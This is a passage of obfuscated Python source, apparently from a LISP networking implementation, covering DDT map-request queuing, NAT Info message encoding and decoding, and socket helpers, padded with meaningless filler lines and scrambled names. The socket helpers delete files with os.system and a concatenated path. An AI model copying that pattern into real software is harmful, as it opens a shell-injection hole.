if 90 - 90: iII111i - I1ii11iIi11i - i1IIi % oO0o * iIii1I11I1II1 - OoOoOO00
if 87 - 87: I11i - i11iIiiIii - OOooOOo . OoOoOO00 + IiII . OoO0O00
def queue_map_request ( self ) :
self . retransmit_timer = threading . Timer ( LISP_DDT_MAP_REQUEST_INTERVAL ,
lisp_retransmit_ddt_map_request , [ self ] )
self . retransmit_timer . start ( )
lisp_ddt_map_requestQ [ str ( self . nonce ) ] = self
if 70 - 70: iIii1I11I1II1 % OoooooooOO / OoO0O00 . O0 - I11i % II111iiii
if 84 - 84: OOooOOo * i1IIi . iIii1I11I1II1 * iII111i + I1Ii111 + II111iiii
def dequeue_map_request ( self ) :
self . retransmit_timer . cancel ( )
if ( self . nonce in lisp_ddt_map_requestQ ) :
lisp_ddt_map_requestQ . pop ( str ( self . nonce ) )
if 97 - 97: Ii1I - IiII
if 64 - 64: oO0o . ooOoO0o / ooOoO0o - II111iiii
if 81 - 81: I1ii11iIi11i
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 64 - 64: oO0o * OoO0O00 / OOooOOo + Ii1I % Oo0Ooo . IiII
if 2 - 2: I1Ii111 + I11i
if 47 - 47: i11iIiiIii + iIii1I11I1II1 % I1ii11iIi11i - oO0o % OoO0O00
if 85 - 85: oO0o * OoOoOO00 / OoOoOO00
if 85 - 85: OOooOOo / I1Ii111 . i1IIi / OoOoOO00 + iIii1I11I1II1
if 71 - 71: OoO0O00
if 96 - 96: I1ii11iIi11i / I1IiiI - I1ii11iIi11i / II111iiii - IiII
if 74 - 74: Ii1I * OoooooooOO % OOooOOo + OoooooooOO + iII111i
if 83 - 83: i1IIi
if 2 - 2: i1IIi / OOooOOo * O0
if 99 - 99: OoooooooOO . OoOoOO00 / II111iiii
if 64 - 64: iII111i / i1IIi . I1IiiI + O0
if 5 - 5: O0 . i11iIiiIii
if 71 - 71: o0oOOo0O0Ooo + iII111i + ooOoO0o
if 27 - 27: OoooooooOO . iII111i * I1Ii111 % O0 + OoooooooOO - iII111i
if 86 - 86: i1IIi
if 81 - 81: OoOoOO00
if 52 - 52: iII111i * IiII % I1IiiI * I11i
if 73 - 73: I1Ii111 * ooOoO0o
if 62 - 62: OOooOOo . I1IiiI * iIii1I11I1II1 + OoO0O00 * ooOoO0o / oO0o
LISP_DDT_ACTION_SITE_NOT_FOUND = - 2
LISP_DDT_ACTION_NULL = - 1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
if 14 - 14: iII111i / OoO0O00
lisp_map_referral_action_string = [
"node-referral" , "ms-referral" , "ms-ack" , "ms-not-registered" ,
"delegation-hole" , "not-authoritative" ]
if 75 - 75: IiII
if 68 - 68: IiII - i1IIi % IiII . OoO0O00 . i11iIiiIii . OoooooooOO
if 32 - 32: iII111i + OoO0O00 % IiII + I1IiiI
if 69 - 69: I1Ii111 + I11i - iIii1I11I1II1 - II111iiii . Ii1I
if 74 - 74: I1ii11iIi11i % o0oOOo0O0Ooo + O0 - i11iIiiIii - IiII % OOooOOo
if 39 - 39: OoO0O00 - o0oOOo0O0Ooo
if 71 - 71: iII111i . OoO0O00 + ooOoO0o - OOooOOo - Oo0Ooo
if 100 - 100: OoooooooOO - o0oOOo0O0Ooo + I1Ii111 . OoooooooOO % i11iIiiIii
if 64 - 64: I1Ii111 % OoooooooOO / i1IIi / OoO0O00
if 2 - 2: I11i % o0oOOo0O0Ooo . OoO0O00 . OoO0O00
if 89 - 89: ooOoO0o - oO0o + II111iiii + OoO0O00 - IiII
if 27 - 27: I1Ii111 - o0oOOo0O0Ooo + OoO0O00
if 38 - 38: OoOoOO00 + OoO0O00 . i11iIiiIii + Ii1I % i1IIi % I1IiiI
if 93 - 93: i11iIiiIii
if 63 - 63: iIii1I11I1II1 - iIii1I11I1II1 % o0oOOo0O0Ooo
if 97 - 97: i1IIi % I11i % OoOoOO00
if 25 - 25: OoOoOO00 . iIii1I11I1II1 - iII111i % II111iiii . OoOoOO00
if 16 - 16: OOooOOo . Oo0Ooo . I1IiiI % O0 . I1ii11iIi11i + i11iIiiIii
if 100 - 100: I1ii11iIi11i - i1IIi - OoO0O00 * o0oOOo0O0Ooo + OoOoOO00
if 31 - 31: i1IIi
if 21 - 21: o0oOOo0O0Ooo / O0 % O0 . OoooooooOO / I1IiiI
if 94 - 94: ooOoO0o + OoO0O00 / ooOoO0o - ooOoO0o + Oo0Ooo + o0oOOo0O0Ooo
if 50 - 50: oO0o . Oo0Ooo
if 15 - 15: Ii1I
if 64 - 64: OoooooooOO
if 25 - 25: IiII
if 29 - 29: OoOoOO00 % ooOoO0o * OoooooooOO
if 8 - 8: i11iIiiIii - I1Ii111 / IiII
if 17 - 17: i11iIiiIii * OoO0O00 . o0oOOo0O0Ooo . OoooooooOO . OoOoOO00 - I1ii11iIi11i
if 78 - 78: I1ii11iIi11i - OoooooooOO + O0
if 15 - 15: I1ii11iIi11i / IiII % I1IiiI
if 16 - 16: Ii1I
if 26 - 26: o0oOOo0O0Ooo / I11i + OoOoOO00 / OoOoOO00
if 31 - 31: I1Ii111
if 84 - 84: i11iIiiIii * OOooOOo . iII111i - Ii1I * i1IIi - I1ii11iIi11i
if 1 - 1: II111iiii
if 94 - 94: I1ii11iIi11i * iII111i % iII111i % I11i - iII111i
if 38 - 38: IiII - OoO0O00 % Ii1I - II111iiii
if 97 - 97: O0 . Ii1I
if 52 - 52: IiII
if 86 - 86: I1Ii111 / O0 + OoooooooOO % oO0o
if 45 - 45: I1IiiI . Oo0Ooo . I11i . Ii1I
if 81 - 81: II111iiii + OoOoOO00 % i11iIiiIii / iII111i . I1Ii111 + II111iiii
if 48 - 48: I1IiiI . I1ii11iIi11i * OoOoOO00 % i1IIi / I1Ii111 * II111iiii
if 62 - 62: o0oOOo0O0Ooo * I1Ii111 . iIii1I11I1II1 / i1IIi
if 75 - 75: OoooooooOO / ooOoO0o - iII111i . OoooooooOO . OoOoOO00 % i1IIi
if 7 - 7: OoOoOO00 . i1IIi * i11iIiiIii % i11iIiiIii
if 54 - 54: OoO0O00 / I1IiiI . Oo0Ooo
if 39 - 39: OoO0O00 . ooOoO0o
if 41 - 41: Oo0Ooo * I1ii11iIi11i - II111iiii - II111iiii
if 7 - 7: oO0o
if 41 - 41: ooOoO0o
if 93 - 93: Ii1I + I1Ii111 + Ii1I
if 23 - 23: I1IiiI - i1IIi / ooOoO0o
if 4 - 4: IiII . I1ii11iIi11i + iII111i % ooOoO0o
if 28 - 28: I1Ii111
if 27 - 27: iII111i * I1IiiI
if 60 - 60: i1IIi / I1IiiI - I1ii11iIi11i
if 41 - 41: I1Ii111 + ooOoO0o / OOooOOo + I11i % Oo0Ooo
class lisp_info ( object ) :
def __init__ ( self ) :
self . info_reply = False
self . nonce = 0
self . private_etr_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . global_etr_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . global_ms_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . ms_port = 0
self . etr_port = 0
self . rtr_list = [ ]
self . hostname = lisp_hostname
if 91 - 91: I1IiiI % I1ii11iIi11i % oO0o / i1IIi * iIii1I11I1II1 + I11i
if 48 - 48: ooOoO0o / I1ii11iIi11i / OoO0O00 / II111iiii * OoOoOO00
def print_info ( self ) :
if ( self . info_reply ) :
O0OO = "Info-Reply"
OooOOoOO0OO = ( ", ms-port: {}, etr-port: {}, global-rloc: {}, " + "ms-rloc: {}, private-rloc: {}, RTR-list: " ) . format ( self . ms_port , self . etr_port ,
# ooOoO0o * oO0o / OOooOOo * Oo0Ooo
# I11i . ooOoO0o * II111iiii
red ( self . global_etr_rloc . print_address_no_iid ( ) , False ) ,
red ( self . global_ms_rloc . print_address_no_iid ( ) , False ) ,
red ( self . private_etr_rloc . print_address_no_iid ( ) , False ) )
if ( len ( self . rtr_list ) == 0 ) : OooOOoOO0OO += "empty, "
for i1I1IIIi11I in self . rtr_list :
OooOOoOO0OO += red ( i1I1IIIi11I . print_address_no_iid ( ) , False ) + ", "
if 13 - 13: iIii1I11I1II1 . OOooOOo . oO0o - Oo0Ooo * I1IiiI / i1IIi
OooOOoOO0OO = OooOOoOO0OO [ 0 : - 2 ]
else :
O0OO = "Info-Request"
Ooo0OOo = "<none>" if self . hostname == None else self . hostname
OooOOoOO0OO = ", hostname: {}" . format ( blue ( Ooo0OOo , False ) )
if 88 - 88: OOooOOo / iII111i + o0oOOo0O0Ooo . Oo0Ooo
lprint ( "{} -> nonce: 0x{}{}" . format ( bold ( O0OO , False ) ,
lisp_hex_string ( self . nonce ) , OooOOoOO0OO ) )
if 96 - 96: I1IiiI . IiII - i11iIiiIii . I1Ii111
if 39 - 39: i11iIiiIii
def encode ( self ) :
oOOOoOO = ( LISP_NAT_INFO << 28 )
if ( self . info_reply ) : oOOOoOO |= ( 1 << 27 )
if 9 - 9: OOooOOo % O0 % O0 / I1ii11iIi11i . II111iiii / II111iiii
if 78 - 78: iIii1I11I1II1 - i1IIi . I11i . o0oOOo0O0Ooo
if 66 - 66: OOooOOo * Oo0Ooo
if 58 - 58: OOooOOo
if 96 - 96: IiII % OoooooooOO + O0 * II111iiii / OOooOOo . I1Ii111
if 47 - 47: OoO0O00 - Oo0Ooo * OoO0O00 / oO0o
if 13 - 13: ooOoO0o
OO0Oo00OO0oo = struct . pack ( "I" , socket . htonl ( oOOOoOO ) )
OO0Oo00OO0oo += struct . pack ( "Q" , self . nonce )
OO0Oo00OO0oo += struct . pack ( "III" , 0 , 0 , 0 )
if 55 - 55: i1IIi . I11i . II111iiii + O0 + ooOoO0o - i1IIi
if 3 - 3: iIii1I11I1II1 / oO0o
if 61 - 61: I1Ii111 / O0 - iII111i
if 44 - 44: i1IIi
if ( self . info_reply == False ) :
if ( self . hostname == None ) :
OO0Oo00OO0oo += struct . pack ( "H" , 0 )
else :
OO0Oo00OO0oo += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
OO0Oo00OO0oo += ( self . hostname + "\0" ) . encode ( )
if 23 - 23: I1ii11iIi11i . OoooooooOO / Ii1I + o0oOOo0O0Ooo
return ( OO0Oo00OO0oo )
if 89 - 89: OoOoOO00 + Oo0Ooo . OoOoOO00 - II111iiii
if 85 - 85: OoooooooOO * OoooooooOO / Ii1I - II111iiii
if 69 - 69: iII111i * I11i
if 43 - 43: o0oOOo0O0Ooo - IiII * Ii1I . i11iIiiIii / II111iiii
if 61 - 61: OoOoOO00 / I1IiiI . I1ii11iIi11i % OOooOOo
O0ooO0O00oo0 = socket . htons ( LISP_AFI_LCAF )
ooOoOoOo = LISP_LCAF_NAT_TYPE
iIi1IiiIII = socket . htons ( 16 )
O0oOOOoOoo0o = socket . htons ( self . ms_port )
iI11 = socket . htons ( self . etr_port )
OO0Oo00OO0oo += struct . pack ( "HHBBHHHH" , O0ooO0O00oo0 , 0 , ooOoOoOo , 0 , iIi1IiiIII ,
O0oOOOoOoo0o , iI11 , socket . htons ( self . global_etr_rloc . afi ) )
OO0Oo00OO0oo += self . global_etr_rloc . pack_address ( )
OO0Oo00OO0oo += struct . pack ( "HH" , 0 , socket . htons ( self . private_etr_rloc . afi ) )
OO0Oo00OO0oo += self . private_etr_rloc . pack_address ( )
if ( len ( self . rtr_list ) == 0 ) : OO0Oo00OO0oo += struct . pack ( "H" , 0 )
if 40 - 40: iIii1I11I1II1
if 33 - 33: i11iIiiIii - oO0o
if 35 - 35: OoOoOO00 - I11i % Ii1I * OoooooooOO
if 84 - 84: I1IiiI * I1ii11iIi11i + iIii1I11I1II1 - II111iiii % O0 . OOooOOo
for i1I1IIIi11I in self . rtr_list :
OO0Oo00OO0oo += struct . pack ( "H" , socket . htons ( i1I1IIIi11I . afi ) )
OO0Oo00OO0oo += i1I1IIIi11I . pack_address ( )
if 99 - 99: i1IIi + iIii1I11I1II1 - ooOoO0o + OoO0O00 + Oo0Ooo . I1ii11iIi11i
return ( OO0Oo00OO0oo )
if 74 - 74: i1IIi
if 80 - 80: ooOoO0o + I1Ii111 . I1ii11iIi11i % OoooooooOO
def decode ( self , packet ) :
OOooo = packet
Iii1iIII1Iii = "I"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 26 - 26: OoOoOO00 . iII111i * iIii1I11I1II1 / IiII
oOOOoOO = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
oOOOoOO = oOOOoOO [ 0 ]
packet = packet [ oOoOo000Ooooo : : ]
if 69 - 69: OoooooooOO / I11i + Ii1I * II111iiii
Iii1iIII1Iii = "Q"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 35 - 35: i11iIiiIii + oO0o
OOO0O0O = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 85 - 85: OoOoOO00 . O0 % OoooooooOO % oO0o
oOOOoOO = socket . ntohl ( oOOOoOO )
self . nonce = OOO0O0O [ 0 ]
self . info_reply = oOOOoOO & 0x08000000
self . hostname = None
packet = packet [ oOoOo000Ooooo : : ]
if 43 - 43: I1IiiI - I11i . I1IiiI / i11iIiiIii % IiII * i11iIiiIii
if 12 - 12: II111iiii - iIii1I11I1II1
if 43 - 43: i11iIiiIii % OoO0O00
if 100 - 100: i1IIi
if 4 - 4: i11iIiiIii - OOooOOo * IiII % OoooooooOO - OoOoOO00
Iii1iIII1Iii = "HH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 81 - 81: Ii1I * ooOoO0o . oO0o . IiII
if 71 - 71: IiII + OoO0O00
if 39 - 39: I1IiiI % IiII / II111iiii / II111iiii
if 95 - 95: II111iiii + i11iIiiIii + o0oOOo0O0Ooo
if 30 - 30: O0 - O0 % iIii1I11I1II1 + iII111i * OoooooooOO
oo0OO0oo , OoooOOO0 = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if ( OoooOOO0 != 0 ) : return ( None )
if 1 - 1: O0
packet = packet [ oOoOo000Ooooo : : ]
Iii1iIII1Iii = "IBBH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 36 - 36: oO0o . iII111i
O0O00O , OOOo00o , O00o00 , Ii1IiII1II = struct . unpack ( Iii1iIII1Iii ,
packet [ : oOoOo000Ooooo ] )
if 24 - 24: ooOoO0o % I1IiiI * OoooooooOO * IiII + Oo0Ooo / Ii1I
if ( Ii1IiII1II != 0 ) : return ( None )
packet = packet [ oOoOo000Ooooo : : ]
if 9 - 9: iII111i % OOooOOo / OoOoOO00 * I1ii11iIi11i % i11iIiiIii / O0
if 45 - 45: i1IIi . ooOoO0o / o0oOOo0O0Ooo % Ii1I
if 1 - 1: iII111i + Ii1I + I1IiiI * OoooooooOO * ooOoO0o
if 23 - 23: OOooOOo / I11i / OoooooooOO - Ii1I / OoO0O00 - OoO0O00
if ( self . info_reply == False ) :
Iii1iIII1Iii = "H"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) >= oOoOo000Ooooo ) :
O0ooO0O00oo0 = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] ) [ 0 ]
if ( socket . ntohs ( O0ooO0O00oo0 ) == LISP_AFI_NAME ) :
packet = packet [ oOoOo000Ooooo : : ]
packet , self . hostname = lisp_decode_dist_name ( packet )
if 60 - 60: OOooOOo . ooOoO0o % i1IIi % Ii1I % ooOoO0o + OoO0O00
if 26 - 26: O0 % o0oOOo0O0Ooo + iII111i * I1ii11iIi11i * I1Ii111
return ( OOooo )
if 4 - 4: OOooOOo * OoooooooOO * i1IIi % I1ii11iIi11i % Oo0Ooo
if 1 - 1: OoO0O00 / iIii1I11I1II1 % I1ii11iIi11i - o0oOOo0O0Ooo
if 62 - 62: I1Ii111 % II111iiii
if 91 - 91: I11i % Ii1I - IiII + iIii1I11I1II1 * iIii1I11I1II1
if 91 - 91: i11iIiiIii + Ii1I
Iii1iIII1Iii = "HHBBHHH"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 85 - 85: I11i % IiII
O0ooO0O00oo0 , ooooO00o0 , ooOoOoOo , OOOo00o , iIi1IiiIII , O0oOOOoOoo0o , iI11 = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 68 - 68: Oo0Ooo . I1Ii111 - o0oOOo0O0Ooo * iIii1I11I1II1 - II111iiii % i1IIi
if 58 - 58: I11i / i11iIiiIii * i11iIiiIii
if ( socket . ntohs ( O0ooO0O00oo0 ) != LISP_AFI_LCAF ) : return ( None )
if 24 - 24: ooOoO0o - I1Ii111 * II111iiii - II111iiii
self . ms_port = socket . ntohs ( O0oOOOoOoo0o )
self . etr_port = socket . ntohs ( iI11 )
packet = packet [ oOoOo000Ooooo : : ]
if 47 - 47: IiII - iIii1I11I1II1 / OoOoOO00 * iII111i - iIii1I11I1II1 % oO0o
if 93 - 93: Ii1I / iII111i
if 100 - 100: Oo0Ooo
if 94 - 94: I1ii11iIi11i / i1IIi * I1IiiI - I11i - I1ii11iIi11i
Iii1iIII1Iii = "H"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 6 - 6: I1ii11iIi11i % o0oOOo0O0Ooo + o0oOOo0O0Ooo / OOooOOo / I1IiiI
if 67 - 67: OoOoOO00 . iII111i / OOooOOo * ooOoO0o + i1IIi
if 100 - 100: OOooOOo . ooOoO0o + I1Ii111 . oO0o
if 20 - 20: i11iIiiIii - i1IIi - iIii1I11I1II1 - OoooooooOO
O0ooO0O00oo0 = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] ) [ 0 ]
packet = packet [ oOoOo000Ooooo : : ]
if ( O0ooO0O00oo0 != 0 ) :
self . global_etr_rloc . afi = socket . ntohs ( O0ooO0O00oo0 )
packet = self . global_etr_rloc . unpack_address ( packet )
if ( packet == None ) : return ( None )
self . global_etr_rloc . mask_len = self . global_etr_rloc . host_mask_len ( )
if 72 - 72: I1Ii111 . OoO0O00
if 59 - 59: I1IiiI * I11i % i1IIi
if 77 - 77: OOooOOo * OoooooooOO + I1IiiI + I1IiiI % oO0o . OoooooooOO
if 60 - 60: iIii1I11I1II1
if 13 - 13: II111iiii + Ii1I
if 33 - 33: i1IIi
if ( len ( packet ) < oOoOo000Ooooo ) : return ( OOooo )
if 36 - 36: ooOoO0o % ooOoO0o . i11iIiiIii
O0ooO0O00oo0 = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] ) [ 0 ]
packet = packet [ oOoOo000Ooooo : : ]
if ( O0ooO0O00oo0 != 0 ) :
self . global_ms_rloc . afi = socket . ntohs ( O0ooO0O00oo0 )
packet = self . global_ms_rloc . unpack_address ( packet )
if ( packet == None ) : return ( OOooo )
self . global_ms_rloc . mask_len = self . global_ms_rloc . host_mask_len ( )
if 42 - 42: OoO0O00 . I1Ii111 / Ii1I
if 57 - 57: iIii1I11I1II1 % I1ii11iIi11i . OOooOOo / oO0o . OoOoOO00
if 74 - 74: I1IiiI * OoO0O00 + OoooooooOO * ooOoO0o . oO0o
if 66 - 66: II111iiii + OOooOOo + i11iIiiIii / II111iiii
if 37 - 37: I1IiiI + OoO0O00 . OoO0O00 % OoOoOO00 + o0oOOo0O0Ooo
if ( len ( packet ) < oOoOo000Ooooo ) : return ( OOooo )
if 81 - 81: i1IIi % iIii1I11I1II1
O0ooO0O00oo0 = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] ) [ 0 ]
packet = packet [ oOoOo000Ooooo : : ]
if ( O0ooO0O00oo0 != 0 ) :
self . private_etr_rloc . afi = socket . ntohs ( O0ooO0O00oo0 )
packet = self . private_etr_rloc . unpack_address ( packet )
if ( packet == None ) : return ( OOooo )
self . private_etr_rloc . mask_len = self . private_etr_rloc . host_mask_len ( )
if 41 - 41: oO0o - iII111i / o0oOOo0O0Ooo . iII111i % Oo0Ooo + OOooOOo
if 82 - 82: ooOoO0o
if 89 - 89: OOooOOo / I1ii11iIi11i . I1IiiI + i11iIiiIii
if 11 - 11: oO0o . i11iIiiIii * ooOoO0o % OoooooooOO % O0
if 59 - 59: i11iIiiIii / OoO0O00
if 48 - 48: iIii1I11I1II1
while ( len ( packet ) >= oOoOo000Ooooo ) :
O0ooO0O00oo0 = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] ) [ 0 ]
packet = packet [ oOoOo000Ooooo : : ]
if ( O0ooO0O00oo0 == 0 ) : continue
i1I1IIIi11I = lisp_address ( socket . ntohs ( O0ooO0O00oo0 ) , "" , 0 , 0 )
packet = i1I1IIIi11I . unpack_address ( packet )
if ( packet == None ) : return ( OOooo )
i1I1IIIi11I . mask_len = i1I1IIIi11I . host_mask_len ( )
self . rtr_list . append ( i1I1IIIi11I )
if 19 - 19: oO0o
return ( OOooo )
if 69 - 69: I1ii11iIi11i % iII111i - OoooooooOO % Ii1I * oO0o
if 12 - 12: OoOoOO00 / I1Ii111 . O0 . IiII - OOooOOo - OoO0O00
if 28 - 28: II111iiii . OoOoOO00 - o0oOOo0O0Ooo
class lisp_nat_info ( object ) :
def __init__ ( self , addr_str , hostname , port ) :
self . address = addr_str
self . hostname = hostname
self . port = port
self . uptime = lisp_get_timestamp ( )
if 89 - 89: I1Ii111 * OoooooooOO . OOooOOo . I11i % i11iIiiIii
if 8 - 8: I1ii11iIi11i + II111iiii . OoO0O00 + I1IiiI - II111iiii % OoO0O00
def timed_out ( self ) :
Ii1i1 = time . time ( ) - self . uptime
return ( Ii1i1 >= ( LISP_INFO_INTERVAL * 2 ) )
if 85 - 85: i11iIiiIii % iII111i + II111iiii
if 16 - 16: ooOoO0o * OoOoOO00 / OoOoOO00 + II111iiii
if 50 - 50: OoO0O00 / OOooOOo % I1IiiI / Ii1I + OoO0O00 . iIii1I11I1II1
class lisp_info_source ( object ) :
def __init__ ( self , hostname , addr_str , port ) :
self . address = lisp_address ( LISP_AFI_IPV4 , addr_str , 32 , 0 )
self . port = port
self . uptime = lisp_get_timestamp ( )
self . nonce = None
self . hostname = hostname
self . no_timeout = False
if 62 - 62: I1Ii111 + OoooooooOO - Ii1I - iIii1I11I1II1
if 80 - 80: OoO0O00
def cache_address_for_info_source ( self ) :
III11II111 = self . address . print_address_no_iid ( ) + self . hostname
lisp_info_sources_by_address [ III11II111 ] = self
if 72 - 72: II111iiii % i11iIiiIii + OoOoOO00 / I1Ii111 - i11iIiiIii
if 39 - 39: i11iIiiIii - OOooOOo / OoO0O00 * OoOoOO00 / IiII
def cache_nonce_for_info_source ( self , nonce ) :
self . nonce = nonce
lisp_info_sources_by_nonce [ nonce ] = self
if 84 - 84: I1ii11iIi11i . iIii1I11I1II1 / Ii1I / II111iiii
if 56 - 56: OOooOOo * iII111i / Ii1I
if 9 - 9: I1ii11iIi11i * i11iIiiIii / I1Ii111 + iIii1I11I1II1
if 1 - 1: OoO0O00 % iIii1I11I1II1 * OoOoOO00 / oO0o
if 73 - 73: iII111i
if 6 - 6: o0oOOo0O0Ooo + Oo0Ooo
if 45 - 45: oO0o % O0 / O0
if 98 - 98: I1Ii111
if 58 - 58: OOooOOo
if 6 - 6: I1ii11iIi11i
if 37 - 37: i11iIiiIii . II111iiii + OOooOOo + i1IIi * OOooOOo
def lisp_concat_auth_data ( alg_id , auth1 , auth2 , auth3 , auth4 ) :
if 18 - 18: ooOoO0o
if ( lisp_is_x86 ( ) ) :
if ( auth1 != "" ) : auth1 = byte_swap_64 ( auth1 )
if ( auth2 != "" ) : auth2 = byte_swap_64 ( auth2 )
if ( auth3 != "" ) :
if ( alg_id == LISP_SHA_1_96_ALG_ID ) : auth3 = socket . ntohl ( auth3 )
else : auth3 = byte_swap_64 ( auth3 )
if 18 - 18: I1Ii111 + OoOoOO00 % OOooOOo - IiII - i1IIi + I1ii11iIi11i
if ( auth4 != "" ) : auth4 = byte_swap_64 ( auth4 )
if 33 - 33: I11i * Ii1I / Oo0Ooo + oO0o % OOooOOo % OoooooooOO
if 29 - 29: Ii1I . II111iiii / I1Ii111
if ( alg_id == LISP_SHA_1_96_ALG_ID ) :
auth1 = lisp_hex_string ( auth1 )
auth1 = auth1 . zfill ( 16 )
auth2 = lisp_hex_string ( auth2 )
auth2 = auth2 . zfill ( 16 )
auth3 = lisp_hex_string ( auth3 )
auth3 = auth3 . zfill ( 8 )
i1oO0o00oOo00oO = auth1 + auth2 + auth3
if 79 - 79: IiII . OoOoOO00 / oO0o % OoO0O00 / Ii1I + I11i
if ( alg_id == LISP_SHA_256_128_ALG_ID ) :
auth1 = lisp_hex_string ( auth1 )
auth1 = auth1 . zfill ( 16 )
auth2 = lisp_hex_string ( auth2 )
auth2 = auth2 . zfill ( 16 )
auth3 = lisp_hex_string ( auth3 )
auth3 = auth3 . zfill ( 16 )
auth4 = lisp_hex_string ( auth4 )
auth4 = auth4 . zfill ( 16 )
i1oO0o00oOo00oO = auth1 + auth2 + auth3 + auth4
if 78 - 78: o0oOOo0O0Ooo + I1Ii111 % i11iIiiIii % I1IiiI - Ii1I
return ( i1oO0o00oOo00oO )
if 81 - 81: i11iIiiIii - II111iiii + I11i
if 52 - 52: II111iiii
if 62 - 62: iII111i / OoO0O00 + i11iIiiIii / Oo0Ooo
if 26 - 26: I1ii11iIi11i - OoO0O00
if 19 - 19: iIii1I11I1II1 / I1ii11iIi11i + O0
if 12 - 12: I11i . OOooOOo + o0oOOo0O0Ooo . OoO0O00 + o0oOOo0O0Ooo
if 56 - 56: i1IIi / i1IIi . OoO0O00 % i1IIi - OoOoOO00 % OOooOOo
if 66 - 66: i11iIiiIii * IiII % IiII . I1IiiI / ooOoO0o
if 50 - 50: IiII . iII111i / o0oOOo0O0Ooo % OoOoOO00 * IiII % I11i
if 15 - 15: Ii1I
def lisp_open_listen_socket ( local_addr , port ) :
if ( port . isdigit ( ) ) :
if ( local_addr . find ( "." ) != - 1 ) :
I1iii = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
if 18 - 18: iIii1I11I1II1 + I11i
if ( local_addr . find ( ":" ) != - 1 ) :
if ( lisp_is_raspbian ( ) ) : return ( None )
I1iii = socket . socket ( socket . AF_INET6 , socket . SOCK_DGRAM )
if 92 - 92: IiII * OoO0O00 . OoOoOO00 + iII111i - I1IiiI
I1iii . bind ( ( local_addr , int ( port ) ) )
else :
ooO0o = port
if ( os . path . exists ( ooO0o ) ) :
os . system ( "rm " + ooO0o )
time . sleep ( 1 )
if 15 - 15: OoO0O00 / OoO0O00 * o0oOOo0O0Ooo * I1ii11iIi11i - o0oOOo0O0Ooo
I1iii = socket . socket ( socket . AF_UNIX , socket . SOCK_DGRAM )
I1iii . bind ( ooO0o )
if 47 - 47: I1IiiI / OoOoOO00 / II111iiii
return ( I1iii )
if 7 - 7: oO0o . ooOoO0o
if 73 - 73: i1IIi % I1Ii111 * ooOoO0o % OoO0O00
if 70 - 70: ooOoO0o * I1ii11iIi11i
if 26 - 26: i11iIiiIii - II111iiii . II111iiii * oO0o / Ii1I + I1IiiI
if 12 - 12: OoO0O00 * iIii1I11I1II1 % I1Ii111 . O0 * OoOoOO00 * OOooOOo
if 34 - 34: I1IiiI . i1IIi
if 38 - 38: iIii1I11I1II1
def lisp_open_send_socket ( internal_name , afi ) :
if ( internal_name == "" ) :
if ( afi == LISP_AFI_IPV4 ) :
I1iii = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
if 64 - 64: i1IIi / OoO0O00
if ( afi == LISP_AFI_IPV6 ) :
if ( lisp_is_raspbian ( ) ) : return ( None )
I1iii = socket . socket ( socket . AF_INET6 , socket . SOCK_DGRAM )
if 68 - 68: I11i * O0 * oO0o + OoOoOO00 / IiII
else :
if ( os . path . exists ( internal_name ) ) : os . system ( "rm " + internal_name )
I1iii = socket . socket ( socket . AF_UNIX , socket . SOCK_DGRAM )
I1iii . bind ( internal_name )
if 42 - 42: iIii1I11I1II1 % i1IIi - OoOoOO00 % I1ii11iIi11i * Ii1I + i11iIiiIii
return ( I1iii )
if 40 - 40: OOooOOo
if 30 - 30: o0oOOo0O0Ooo - Oo0Ooo + iII111i / O0
if 94 - 94: IiII
if 69 - 69: I1Ii111 . I1Ii111
if 53 - 53: i11iIiiIii + iII111i * Oo0Ooo - I1Ii111
if 61 - 61: o0oOOo0O0Ooo / OOooOOo . II111iiii - I1IiiI * i11iIiiIii
if 8 - 8: iII111i % o0oOOo0O0Ooo
def lisp_close_socket ( sock , internal_name ) :
sock . close ( )
if ( os . path . exists ( internal_name ) ) : os . system ( "rm " + internal_name )
return
if 87 - 87: Ii1I % I11i / I1Ii111
if 21 - 21: OoO0O00 + Ii1I / I1Ii111
if 75 - 75: I1Ii111 . Ii1I % iIii1I11I1II1 / OoOoOO00
if 38 - 38: i1IIi
if 1 - 1: I1ii11iIi11i + OoO0O00 % I11i . OOooOOo + i1IIi / oO0o
if 35 - 35: ooOoO0o % OoOoOO00 % OoO0O00 + OOooOOo / IiII * OoOoOO00
